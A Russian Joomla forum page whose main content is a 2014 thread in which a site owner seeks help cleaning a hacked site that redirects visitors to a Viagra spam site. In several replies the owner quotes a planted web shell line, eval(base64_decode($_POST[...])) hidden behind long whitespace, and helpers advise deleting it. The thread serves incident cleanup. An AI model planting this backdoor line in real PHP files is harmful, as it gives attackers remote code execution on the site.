Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 15 Ответов
  • 3009 Просмотров
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Здравствуйте! Недавно появилась проблема с сайтом. При нажатии на ссылки переводило на сайт с рекламой виагрой (не муз. группы). Тогда я просто убрал перенаправление и все стало нормально, но сейчас опять появилось и теперь даже не могу войти в админку- переводит на этот сайт. Что делать? Где искать начало проблемы? Помогите, пожалуйста!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #1 : 23.06.2014, 11:19:19 »
Ищите шеллы, и возможную уязвимость как это могло произойти

P.S: Помимо вас, еще кто то имеет доступ!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Редирект на сайт с виагрой
« Ответ #2 : 23.06.2014, 11:58:17 »
Версия Joomla актуальная ? Проверяй "левые" папки на хостинге, файлы .htaccess ,  .js
сканер айболит в помощь
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #3 : 24.06.2014, 12:21:55 »
Появился доступ к сайту, к админке, но ничего не получается сохранить.. При нажатии на кнопку "сохранить" переводит на сайт опять.. как еще можно закрыть сайт?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #5 : 24.06.2014, 14:33:15 »
Восстановил сайт из копии, но скорее всего зараженные файлы остались. В письмах от хостинга есть список зараженных файлов (возможно зараженных). Подскажите, пожалуйста, что делать дальше?

*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #6 : 24.06.2014, 14:44:37 »
вот по типу таких ссылка:

HEX}base64.inject.unclassed.7 : u1111111 : /var/www/u1111111/data/www/site-name/media/media/js/lib.php

Что делать? Как я понял base64.inject и т.д. и есть заражение... Что с этим делать, как чистить? Подскажите, пожалуйста. Заранее огромное спасибо!
« Последнее редактирование: 24.06.2014, 14:51:21 от bezzlaa »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #7 : 24.06.2014, 15:04:00 »
Имеет смысл делать полноценную профилактику, так как нужно решать вопрос с корня, вредонос можите поискать с помощью AI-BOLIT, но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #8 : 24.06.2014, 15:11:31 »
Через скрипт удалось найти и заменить, но полноценное совпадение нашлось убралось только в одном файле, но тем не менее эта вставка (base64 и т.д.) присутствует во многих файлах. Потом проверил сайт другим скриптом, вот что он выдал:

"File: /var/www/u1111/data/www/site-name/media/mod_vt_nivo_slider/css/system.php
String:: $_POST[

File: /var/www/u1111/data/www/site-name/media/mailto/images/alias.php
String:: $_POST[" и т.д.

Что именно удалять? Боюсь, удалить не то, что надо или неправильно, обрывком...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Редирект на сайт с виагрой
« Ответ #9 : 24.06.2014, 15:20:03 »
но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку
вам же написали
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #10 : 26.06.2014, 13:45:29 »
Если бы мне изначально было к кому обратиться- я бы так и сделал.

Помогите определить, что именно удалять? Нашел скрипт для быстрого поиска и замены, но опять же, не получается выбрать нужный кусок.

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

Причем вот здесь (в кв.скобках) "['nf73356']" всегда разные символы. Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Редирект на сайт с виагрой
« Ответ #11 : 26.06.2014, 13:55:03 »


Помогите определить, что именно удалять?

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

удаляй всю строку
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #12 : 26.06.2014, 14:39:16 »
Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...
А это и не надо раскодировать, это название переменной, а вот почему удалить не получается это вопрос...
 crazy!
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #13 : 26.06.2014, 14:42:01 »
Не получается, ибо каждый раз внутри квадратных скобок разные символы, во всех файлах разный код получается
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #14 : 26.06.2014, 14:43:39 »
Если удалять вручную, то там не одна сотня файлов...
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #15 : 26.06.2014, 15:21:41 »
что то и ручками приходится делать! даже если это и сотня файлов.

P.S: Тут поиск по файлам, через регулярку поможет!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Взломали сайт Antonkiil

Автор kristina_r

Ответов: 25
Просмотров: 3716
Последний ответ 24.08.2026, 23:47:57
от Sulpher
При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 6160
Последний ответ 31.03.2024, 16:14:32
от SeBun
Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 4174
Последний ответ 14.02.2024, 13:15:59
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 6278
Последний ответ 25.05.2023, 08:49:57
от Театрал
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 3668
Последний ответ 05.11.2021, 21:47:31
от wishlight